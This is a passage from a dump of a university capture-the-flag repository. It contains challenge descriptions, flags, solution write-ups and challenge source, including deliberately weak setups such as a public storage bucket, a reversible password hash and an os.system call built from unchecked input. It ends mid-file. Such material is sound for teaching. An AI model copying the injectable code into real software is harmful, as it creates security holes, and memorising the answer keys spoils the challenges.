https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/xk.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ye.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ye.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/yt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/yt.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/za.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/za.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/zm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/zm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/zw.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/zw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/flag: -------------------------------------------------------------------------------- 1 | uoftctf{s3rv1c3_4cc0un75_c4n_83_un54f3} -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/chal/secret/dont_show: -------------------------------------------------------------------------------- 1 | uoftctf{allUsers_is_not_safe} -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/chal/src/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Flags 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 |

Flags

24 | 25 |

I love flags!

26 | 27 |

I collect flags from all around the world. Here are some of my recent finds:

28 | 29 |

here's a flag i got while on a trip to antwerp!!

30 |

31 | 32 |

and here’s a flag from Guam:

33 |

34 | 35 |
36 | 37 | 38 | -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/chal/src/static/antwerp.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket/chal/src/static/antwerp.jpg -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/chal/src/static/guam.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket/chal/src/static/guam.jpg -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/solve/solve.md: -------------------------------------------------------------------------------- 1 | Navigate to https://storage.googleapis.com/out-of-the-bucket. The bucket's object listing is publicly readable, and it reveals another folder, secret/. The flag is therefore located at https://storage.googleapis.com/out-of-the-bucket/secret/dont_show -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/README.md: -------------------------------------------------------------------------------- 1 | Challenge: Prediction API 2 | 3 | Description: I downloaded a model that performs categorical classification on images. I want to use this model in a web application, but it doesn't seem to be very accurate. Can you check out the weights and see if you can figure out what's wrong? 
-------------------------------------------------------------------------------- /Miscellaneous/Prediction API/solve/flag: -------------------------------------------------------------------------------- 1 | UofTCTF{1t_w4s_ju5t_mn1st_101} 2 | -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/solve/solve.md: -------------------------------------------------------------------------------- 1 | The random-noise model extraction attack is presented here: https://arxiv.org/pdf/1912.08987.pdf. Model extraction attacks were first explored in this paper: https://arxiv.org/abs/1609.02943 2 | 3 | The provided proof of concept is an implementation of the presented pseudocode. It does not interact with the server as the challenge requires, but it can easily be adapted to do so using `zipfile` and `requests`. Additionally, the PoC is written in PyTorch, but it can easily be ported to TensorFlow. Notably, the solution achieves a <1% margin of error relative to the victim model, while the flag checker only required a <20% margin of error. 4 | 5 | An alternative solution is to notice the 28x28 image requirement and the softmax output vector with 10 classes, from which one can infer that the model is likely a CNN trained on MNIST. A few simple inputs confirm that the model is indeed trained on MNIST. It is then as simple as training a model with an identical architecture on the same dataset. Training-set leakage techniques can also be used to obtain more information about the dataset. 
-------------------------------------------------------------------------------- /Miscellaneous/Prediction API/src/mnist.npz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Prediction API/src/mnist.npz -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/src/model.h5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Prediction API/src/model.h5 -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.3.3 2 | h5py==3.10.0 3 | Jinja2==3.1.2 4 | keras==2.15.0 5 | numpy==1.25.2 6 | requests==2.31.0 7 | requests-oauthlib==1.3.1 8 | tensorflow==2.15.0 9 | Werkzeug==2.3.7 10 | zipp==3.17.0 11 | gunicorn==21.2.0 -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/README.md: -------------------------------------------------------------------------------- 1 | # Source Code Recovery 2 | 3 | Oops I deleted the source code, do you mind recovering it? 
-------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | services: 3 | flag_server: 4 | build: 5 | context: ./flag_server 6 | ports: 7 | - "1337:1337" 8 | volumes: 9 | - type: bind 10 | source: ./submissions/src 11 | target: /submit/src 12 | - type: bind 13 | source: ./submissions/binary 14 | target: /submit/binary 15 | depends_on: 16 | - exec_jail 17 | exec_jail: 18 | build: 19 | context: ./exec_jail 20 | ports: 21 | - "5000:5000" 22 | volumes: 23 | - type: bind 24 | source: ./submissions/binary 25 | target: /srv/submit/binary 26 | read_only: true 27 | privileged: true 28 | 29 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/exec_jail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye AS app 2 | 3 | RUN useradd -m ctfuser 4 | 5 | RUN chown root:root /home/ctfuser 6 | 7 | RUN chmod 755 /home/ctfuser 8 | 9 | WORKDIR /home/ctfuser/app 10 | 11 | COPY --chown=root:root exec_jail.py . 
12 | 13 | RUN chown -R root:root /home/ctfuser && \ 14 | chmod -R 555 /home/ctfuser/app 15 | 16 | FROM pwn.red/jail 17 | 18 | COPY --from=app / /srv 19 | 20 | COPY --chmod=555 ./run /srv/app/run 21 | 22 | ENV JAIL_PIDS=50 JAIL_MEM=25M JAIL_TIME=120 JAIL_TMP_SIZE=100K 23 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/exec_jail/exec_jail.py: -------------------------------------------------------------------------------- 1 | import ast 2 | import subprocess 3 | import base64 4 | import os 5 | 6 | d = ast.literal_eval(base64.b64decode(input()).decode()) 7 | 8 | os.system(f"cp {d['executable']} /tmp/a.out && chmod +x /tmp/a.out") 9 | 10 | b = subprocess.check_output(["/tmp/a.out"], input=d["otp"], stderr=subprocess.STDOUT, timeout=20) 11 | print(b.decode(), end="") 12 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/exec_jail/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/python exec_jail.py 4 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/flag_server/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y gcc socat sudo netcat-traditional && \ 5 | apt-get clean && \ 6 | rm -rf /var/lib/apt/lists/* 7 | 8 | RUN mkdir /app 9 | 10 | COPY --chown=root --chmod=500 flag_server.py /app/flag_server.py 11 | COPY --chown=root --chmod=500 flag.py /app/flag.py 12 | 13 | RUN chown root:root /app && \ 14 | chmod 700 /app 15 | 16 | 17 | EXPOSE 1337 18 | 19 | WORKDIR /app 20 | 21 | ENTRYPOINT ["socat", "TCP-LISTEN:1337,reuseaddr,fork", "EXEC:'python /app/flag_server.py',pty,ctty,stderr,raw,echo=0"] 22 | 
-------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/flag_server/flag.py: -------------------------------------------------------------------------------- 1 | FLAG = "uoftctf{ree3eeCurzi0n_Thm_stA73s_Tur1ng_mACH1Nes_CAn_kNOw_th31r_oWn_s0URCe}" 2 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/setup.sh: -------------------------------------------------------------------------------- 1 | sudo mkdir submissions submissions/src submissions/binary 2 | sudo chmod 333 submissions submissions/src submissions/binary 3 | sudo docker compose up --build --force-recreate 4 | -------------------------------------------------------------------------------- /OSINT/Flying High/README.md: -------------------------------------------------------------------------------- 1 | Name: Flying High 2 | 3 | Description: 4 | I'm trying to find a flight I took back in 2012. I forgot the airport and the plane, but I know it is the one with an orange/red logo on the right side of this photo I took. Can you help me identify it? 5 | 6 | The flag format is UofTCTF{AIRPORT_AIRLINE_AIRCRAFT}. AIRPORT is the 3 letter IATA code, AIRLINE is the name of the airline (dash-separated if required), and AIRCRAFT is the aircraft model and variant (omit manufacturer name). For example, UofTCTF{YYZ_Air-Canada_A320-200} or UofTCTF{YYZ_Delta_767-300}. 7 | 8 | Note: The aircraft variant should be of X00 format; ie. there may be models with XYZ-432, but the accepted variant will be XYZ-400. 
-------------------------------------------------------------------------------- /OSINT/Flying High/chal/airplane.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/OSINT/Flying High/chal/airplane.png -------------------------------------------------------------------------------- /OSINT/Flying High/solve/flag.txt: -------------------------------------------------------------------------------- 1 | UofTCTF{BOD_Iberia_A340-600} 2 | UofTCTF{BOD_Iberia_A340-300} -------------------------------------------------------------------------------- /OSINT/Flying High/solve/solve.md: -------------------------------------------------------------------------------- 1 | From the company "Novespace" we can easily determine it is French and based in the Bordeaux region. [The following link](https://www.airzerog.com/novespace-and-avico/) states "Based in the Bordeaux-Mérignac airport area" so the airport is Bordeaux-Mérignac and 3-letter IATA code is BOD. 2 | 3 | Taking a look at the plane, we can check the tail logo via [the following tool](https://airlinersgallery.smugmug.com/Airline-Tails/Airline-Tails/). We see that the airline is Air Nostrum from [this](https://airlinersgallery.smugmug.com/Airline-Tails/Airline-Tails/i-tbxJNgq/A). However, Air Nostrum is now in a merger and the logo was held by Iberia ([based on this](https://en.wikipedia.org/wiki/Iberia_(airline)#/media/File:Iberia_logo.svg)) in 2012. 4 | 5 | Additionally, this is confirmed by the fact that Air Nostrum doesn't own any long-haul aircraft with 4 engines ([see here](https://web.archive.org/web/20120720152644/http://en.wikipedia.org/wiki/Air_Nostrum)). We can thus conclude the aircraft is owned by Iberia. 6 | 7 | We can now narrow down a list of aircraft using [this tool](https://www.aircraftrecognitionguide.com/identify-aircraft/identify-by-airplane-characteristics). 
The characteristics are: 8 | * 4 jets 9 | * Engines under wings 10 | * Swept wings 11 | * Nose wheel landing gear 12 | 13 | We see a collection of aircraft including the A340. 14 | 15 | From [Iberia's wiki page](https://en.wikipedia.org/wiki/Iberia_(airline)), we can see the only 4-engine aircraft owned by Iberia in 2012 is the Airbus A340-600 or A340-300. So the flag is: 16 | 17 | **UofTCTF{BOD_Iberia_A340-600}** or **UofTCTF{BOD_Iberia_A340-300}** (both were accepted) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # University of Toronto Capture the Flag Competition 2024 2 | This repository contains the solutions to challenges during UofTCTF 2024. The source is also included in most of the challenge directories. 3 | -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/readme.md: -------------------------------------------------------------------------------- 1 | # all worbled up 2 | 3 | ## desc 4 | 5 | last time we had a worbler, it failed miserably and left everyone sad, and no one got their flags. 6 | now we have another one, maybe it'll work this time? 
7 | 8 | output: 9 | 10 | ```text 11 | _ _ 12 | | | | | 13 | __ _____ _ __| |__ | | ___ _ __ 14 | \ \ /\ / / _ \| '__| '_ \| |/ _ \ '__| 15 | \ V V / (_) | | | |_) | | __/ | 16 | \_/\_/ \___/|_| |_.__/|_|\___|_| 17 | 18 | ========================================== 19 | Enter flag: *redacted* 20 | Here's your flag: a81c0750d48f0750 21 | ``` 22 | 23 | ## flag 24 | 25 | `uoftctf{d3w0rb13d}` 26 | -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/solve/makedis.py: -------------------------------------------------------------------------------- 1 | import dis 2 | import worbler 3 | 4 | dis.dis(worbler.main) -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/solve/soln.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | This challenge is simply disassembled Python bytecode. The objective is to reconstruct the source script (`worbler.py`) and find the flag based on the given output. The regex gives a hint as to what characters and how many of them the flag has. 4 | 5 | The solve script is in the solve directory as `soln.py`. Running it should produce the flag. 
6 | -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/solve/soln.py: -------------------------------------------------------------------------------- 1 | from itertools import product 2 | 3 | def worbble(s): 4 | s1 = 5 5 | s2 = 31 6 | 7 | for n in range(len(s)): 8 | s1 = (s1 + ord(s[n]) + 7) % 65521 9 | s2 = (s1 * s2) % 65521 10 | 11 | return (s2 << 16) | s1 12 | 13 | def shmorble(s): 14 | r = "" 15 | for i in range(len(s)): 16 | r += s[i - len(s)] 17 | 18 | return r 19 | 20 | def blorble(a, b): 21 | return format(a, 'x') + format(b, 'x') 22 | 23 | for s in product("bdrw013", repeat=9): 24 | string = "uoftctf{" + "".join(s) + "}" 25 | a = worbble(string) 26 | b = worbble(string[::-1]) 27 | 28 | final = shmorble(blorble(a, b)) 29 | 30 | if final == "a81c0750d48f0750": 31 | print(final, string) -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/solve/worbler.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | pattern = re.compile('^uoftctf\\{([bdrw013]){9}\\}$') 4 | 5 | def worble(s): 6 | s1 = 5 7 | s2 = 31 8 | 9 | for n in range(len(s)): 10 | s1 = (s1 + ord(s[n]) + 7) % 65521 11 | s2 = (s1 * s2) % 65521 12 | 13 | return (s2 << 16) | s1 14 | 15 | def shmorble(s): 16 | r = "" 17 | for i in range(len(s)): 18 | r += s[i - len(s)] 19 | 20 | return r 21 | 22 | def blorble(a, b): 23 | return format(a, 'x') + format(b, 'x') 24 | 25 | print(" _ _ ") 26 | print(" | | | | ") 27 | print(" __ _____ _ __| |__ | | ___ _ __ ") 28 | print(" \ \ /\ / / _ \| '__| '_ \| |/ _ \ '__| ") 29 | print(" \ V V / (_) | | | |_) | | __/ | ") 30 | print(" \_/\_/ \___/|_| |_.__/|_|\___|_| ") 31 | print(" ") 32 | print("==========================================") 33 | 34 | flag = input("Enter flag: ") 35 | if not pattern.match(flag): 36 | print("Incorrect format!") 37 | else: 38 | a = worble(flag) 39 | b = 
worble(flag[::-1]) 40 | 41 | print("Here's your flag:", shmorble(blorble(a, b))) -------------------------------------------------------------------------------- /Reverse Engineering/CEOs Lost Password/chal/BankChallenge.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Reverse Engineering/CEOs Lost Password/chal/BankChallenge.jar -------------------------------------------------------------------------------- /Reverse Engineering/CEOs Lost Password/readme.md: -------------------------------------------------------------------------------- 1 | Challenge: CEO's lost password 2 | 3 | Description: Hello there brave programmer! 4 | 5 | I am the CEO of TotallySecureBank™, I have a lot of money in my bank account but I forgot my password! My username is `admin` and I have $100000 in my account. 6 | 7 | If you could recover my account you can use my password as a flag (flag would be `uoftctf{MyPasswordHere}`) 8 | 9 | You can try the bank software by running `java -jar BankChallenge.jar` and use the example user `user` with the password being `example`. -------------------------------------------------------------------------------- /Reverse Engineering/CEOs Lost Password/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{%S7rONgadMInPaSSwORd32!%} -------------------------------------------------------------------------------- /Reverse Engineering/CEOs Lost Password/solve/readme.md: -------------------------------------------------------------------------------- 1 | The bank software used a terrible hashing method for its passwords: the "hash" is reversible, so a stored hash can be turned back into the original password. 2 | To get the password, you had to decompile the jar file with a decompiler, then locate the hash function and the admin's hash. Finally, you had to reverse the hash function. 
3 | See `solution.java` for a more technical explanation. -------------------------------------------------------------------------------- /Reverse Engineering/CSS Password/README.md: -------------------------------------------------------------------------------- 1 | Challenge: CSS Password 2 | 3 | Description: My web developer friend said JavaScript is insecure so he made a password vault with CSS. Can you find the password to open the vault? 4 | 5 | Wrap the flag in `uoftctf{}` 6 | 7 | Make sure to use a browser that supports the CSS `:has` selector, such as Firefox 121+ or Chrome 105+. The challenge is verified to work for Firefox 121.0. 8 | -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/chal/maze: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Reverse Engineering/RandomMaze/chal/maze -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/chal/soln.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Looking at the source code file `nodes.c`, we see that there are 8 nodes, and each node is a binary tree node that holds a pointer to the next node and a null pointer. At the very bottom of the tree is a pointer to the function to call, `profit()`, which prints out the flag. 4 | 5 | The flag is stored in an array where each character has been XORed with a different byte, so the flag cannot be read directly from the decompiler. In the main file `maze.c`, the solver's answer is read in as a 64-bit long in hexadecimal format, and then re-cast as an 8-byte array, each byte being the number that is considered for one node. 6 | 7 | Each number is then checked for parity and validity. If it is even, the right node is taken.
If it is odd, the left node is taken. There are also further checks on the number (such as whether it is divisible by 3 or 4) that render it invalid, in which case the `oops()` function is called and the maze fails. If the number is valid, it is XORed with the corresponding number in the flag array, and if the number is correct, the XOR yields the correct flag character. 8 | 9 | The objective is to figure out which numbers solve the maze, and the checks (both for validity and parity) are meant to help narrow down the solution space. This is also why I gave the free hint 10 | that the flag is completely alphanumeric, ruling out all other ASCII characters. This will of course involve some guess and check, but a bunch of educated reasoning is also required. 11 | 12 | The solution is thus to enter each byte in hexadecimal form when prompted, in reverse order since x64 is little endian. 13 | 14 | The correct numbers can be found in the `maze.c` source file. 15 | -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/readme.md: -------------------------------------------------------------------------------- 1 | # the maze 2 | 3 | ## desc 4 | 5 | a little maze for you! just don't get lost! :3 6 | 7 | free hint: the entire flag is alphanumeric ASCII.
8 | 9 | ## flag 10 | 11 | `uoft{am4z31ng}` 12 | -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/solve/nodes.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include "nodes.h" 4 | 5 | extern void profit(); 6 | extern void oops(); 7 | 8 | struct node level8 = { 9 | NULL, 10 | NULL, 11 | profit, 12 | }; 13 | 14 | struct node level7 = { 15 | &level8, 16 | NULL, 17 | NULL, 18 | }; 19 | 20 | struct node level6 = { 21 | NULL, 22 | &level7, 23 | NULL, 24 | }; 25 | 26 | struct node level5 = { 27 | NULL, 28 | &level6, 29 | NULL, 30 | }; 31 | 32 | struct node level4 = { 33 | &level5, 34 | NULL, 35 | NULL, 36 | }; 37 | 38 | struct node level3 = { 39 | NULL, 40 | &level4, 41 | NULL, 42 | }; 43 | 44 | struct node level2 = { 45 | &level3, 46 | NULL, 47 | NULL, 48 | }; 49 | 50 | struct node level1 = { 51 | &level2, 52 | NULL, 53 | NULL, 54 | }; -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/solve/nodes.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | struct node { 4 | struct node *left; 5 | struct node *right; 6 | void (*hmmmm)(void); 7 | }; 8 | 9 | -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/solve/soln.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define LEFT 1 4 | #define RIGHT 0 5 | 6 | int main() { 7 | int lr[8] = {RIGHT, LEFT, LEFT, RIGHT, LEFT, RIGHT, RIGHT, LEFT}; 8 | 9 | char flag[] = "ON#X~o8&"; // encrypted flag 10 | char ans[] = "am4z31ng"; 11 | 12 | for (int i = 0; i < 8; i++) { 13 | ans[i] ^= flag[i]; 14 | } 15 | 16 | printf("%llx\n", *(unsigned long long *)ans); 17 | 18 | for (int i = 0; i < 8; i++) { 19 | if (ans[i] & 3 == 0 || ans[i] == (ans[i] / 3) * 3) { 20 | printf("Character ruled out: %02x\n", 
ans[i]); 21 | return 1; 22 | } 23 | } 24 | 25 | unsigned char sol[8]; 26 | 27 | for (int i = 0; i < 8; i++) { 28 | int found_char = 0; 29 | for (unsigned char c = 0x14; c <= 'd' ; c++) { 30 | if ((c & 3) == 0) 31 | continue; 32 | if (c == (c / 3) * 3) 33 | continue; 34 | 35 | if ((c & 1) == lr[i]) { 36 | printf("%02x", c); 37 | sol[i] = c; 38 | found_char = 1; 39 | break; 40 | } 41 | } 42 | 43 | if (!found_char) { 44 | printf("No character found for %d\n", i); 45 | return 1; 46 | } 47 | } 48 | 49 | puts(""); 50 | 51 | printf("%llx\n", *(unsigned long long *)sol); 52 | 53 | return 0; 54 | } -------------------------------------------------------------------------------- /Reverse Engineering/love-debug/chal/love-letter-for-you: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Reverse Engineering/love-debug/chal/love-letter-for-you -------------------------------------------------------------------------------- /Reverse Engineering/love-debug/solve/result.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Reverse Engineering/love-debug/solve/result.bin -------------------------------------------------------------------------------- /Reverse Engineering/love-debug/solve/result2.bin: -------------------------------------------------------------------------------- 1 | ❤️ 2 |  3 |     Are you amazed? You like it? Say something! 4 | You're just here for the flag, are you? 
5 | uoftctf{r3CuR51v3LY_3nuM3r4Bl3_R1zZ} -------------------------------------------------------------------------------- /Reverse Engineering/love-debug/src/README.md: -------------------------------------------------------------------------------- 1 | # Love Debug - Source 2 | 3 | All of the bf code here was originally written in a C-like language 4 | compiled to Brainf**k using [this compiler](https://github.com/arthaud/c2bf). 5 | 6 | The Brainf**k code was then compiled to native x86-64 7 | using [a compiler made by yours truly](https://github.com/kako57/bf-compiler) 8 | 9 | `love-letter-for-you.bf` is the code for the challenge. 10 | Depending on the terminal, it might print a squished heart 11 | or a squished heart. 12 | 13 | If you want the code for the "fixed" heart, in here 14 | are three sources for the three different terminals 15 | I use the most. These don't include the challenge, 16 | so feel free to send hearts to people ~~while f**king 17 | their brains out~~. 18 | 19 | ``` 20 | alacritty.bf # for alacritty 21 | vscode.bf # for vscode terminal 22 | windows-terminal.bf # for windows terminal 23 | ``` 24 | -------------------------------------------------------------------------------- /Web/Guestbook/README.md: -------------------------------------------------------------------------------- 1 | Name: CTF Guestbook 2 | 3 | Description: I made this cool guestbook for the CTF. Please sign it. -------------------------------------------------------------------------------- /Web/Guestbook/chal/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | My Guestbook 6 | 16 | 17 | 18 |

19 | Hi! I made this guestbook for my site, please sign it. 20 |

21 | 22 |

Last 10 user entries in the guestbook:

23 |

Loading...

24 |
    25 |
26 | 27 |

Sign the guestbook:

28 |
29 | 30 | 31 | 32 |
33 | 34 | -------------------------------------------------------------------------------- /Web/Guestbook/solve/README.md: -------------------------------------------------------------------------------- 1 | To solve this puzzle you first need to notice that the guestbook HTML code references a Google Sheet with id `1PGFh37vMWFrdOnIoItnxiGAkIqSxlJDiDyklp9OVtoQ` 2 | 3 | Opening https://docs.google.com/spreadsheets/d/1PGFh37vMWFrdOnIoItnxiGAkIqSxlJDiDyklp9OVtoQ we find all the guestbook entries 4 | 5 | Doing a quick search for "uofctf" shows that we are on the right track because it finds a partial flag in a hidden sheet 6 | 7 | To access the hidden sheet we can download the sheet as a .xlsx file (or make a copy), which would include the hidden sheets: hiding a sheet only changes what is displayed and does not restrict access to its contents. -------------------------------------------------------------------------------- /Web/Guestbook/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{@PP 5cRIP7 !5 s0 coOL} -------------------------------------------------------------------------------- /Web/Jay's Bank/README.md: -------------------------------------------------------------------------------- 1 | # Jay's Bank 2 | 3 | My bank is still in pre-alpha-alpha-alpha stage, but I'm sure it's secure enough to keep all of your information safe. -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y default-mysql-client netcat 5 | 6 | WORKDIR /app 7 | 8 | COPY package*.json ./ 9 | RUN npm install 10 | 11 | COPY index.js ./ 12 | COPY views ./views 13 | COPY utils ./utils 14 | COPY static ./static 15 | COPY routes ./routes 16 | COPY middleware ./middleware 17 | COPY config/init.sql ./config/init.sql 18 | 19 | EXPOSE 3000 20 | 21 | CMD bash -c "echo Waiting for MySQL to start... && \ 22 | while !
nc -z db 3306; do sleep 1; done; \ 23 | echo MySQL started; \ 24 | npm start" 25 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/config/init.sql: -------------------------------------------------------------------------------- 1 | ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'YNgBBTYdXcXKcQmYBzqYM7Xx9KoEDAy1'; 2 | CREATE USER 'web'@'localhost' IDENTIFIED WITH mysql_native_password BY 'J7zZR60PmM3TmaBk8sVW5fVz8za2svp1'; 3 | FLUSH PRIVILEGES; 4 | DROP DATABASE IF EXISTS ctf_challenge; 5 | CREATE DATABASE ctf_challenge; 6 | USE ctf_challenge; 7 | 8 | CREATE TABLE users ( 9 | id INT NOT NULL AUTO_INCREMENT, 10 | username NVARCHAR(255) NOT NULL, 11 | password NVARCHAR(255) NOT NULL, 12 | data NVARCHAR(255) NOT NULL, 13 | PRIMARY KEY (id) 14 | ); 15 | 16 | INSERT INTO users (username, password, data) VALUES ('admin', '9LCD5iU78ZbtsHhcDgGvsT9Z1Nvy54z8', '{"role": "not_admin_lmao"}'); 17 | 18 | GRANT INSERT, SELECT, UPDATE ON ctf_challenge.users TO 'web'@'localhost'; 19 | FLUSH PRIVILEGES; -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | services: 3 | app: 4 | build: 5 | context: . 
6 | dockerfile: Dockerfile 7 | ports: 8 | - "3000:3000" 9 | depends_on: 10 | - db 11 | environment: 12 | - FLAG=uoftctf{IiIiIiI_am_a_pro_JSON_injector_IiIiIiI} 13 | - DB_HOST=db 14 | - MYSQL_USER=web 15 | - MYSQL_PASSWORD=J7zZR60PmM3TmaBk8sVW5fVz8za2svp1 16 | - MYSQL_DATABASE=ctf_challenge 17 | db: 18 | image: mysql:5.7 19 | volumes: 20 | - ./config/init.sql:/docker-entrypoint-initdb.d/init.sql 21 | environment: 22 | MYSQL_ROOT_PASSWORD: YNgBBTYdXcXKcQmYBzqYM7Xx9KoEDAy1 23 | MYSQL_DATABASE: ctf_challenge 24 | MYSQL_USER: web 25 | MYSQL_PASSWORD: J7zZR60PmM3TmaBk8sVW5fVz8za2svp1 26 | command: ["--sql-mode=NO_ENGINE_SUBSTITUTION,ERROR_FOR_DIVISION_BY_ZERO"] 27 | ports: 28 | - "3306:3306" 29 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/index.js: -------------------------------------------------------------------------------- 1 | const express = require("express"); 2 | const router = require("./routes"); 3 | const db = require("./utils/db.js"); 4 | const cookieParser = require("cookie-parser"); 5 | const app = express(); 6 | 7 | const Database = new db(); 8 | 9 | app.use(express.json()); 10 | app.use(cookieParser()); 11 | app.use(express.static("static")); 12 | app.set("view engine", "ejs"); 13 | 14 | app.use("/", router(Database)); 15 | 16 | app.all("*", (req, res) => { 17 | res.status(404).send("404 Not Found"); 18 | }); 19 | 20 | app.listen(3000, () => { 21 | console.log("Listening on port 3000"); 22 | }); 23 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/middleware/authMiddleware.js: -------------------------------------------------------------------------------- 1 | const jwt = require("jsonwebtoken"); 2 | const {JWT_SECRET} = require("../utils/config.js"); 3 | 4 | const jwtAuth = (req, res, next) => { 5 | const token = req.cookies.auth_token; 6 | if (!token) { 7 | return res.status(401).redirect("/login"); 8 | } 9 | try { 10 | const decoded = 
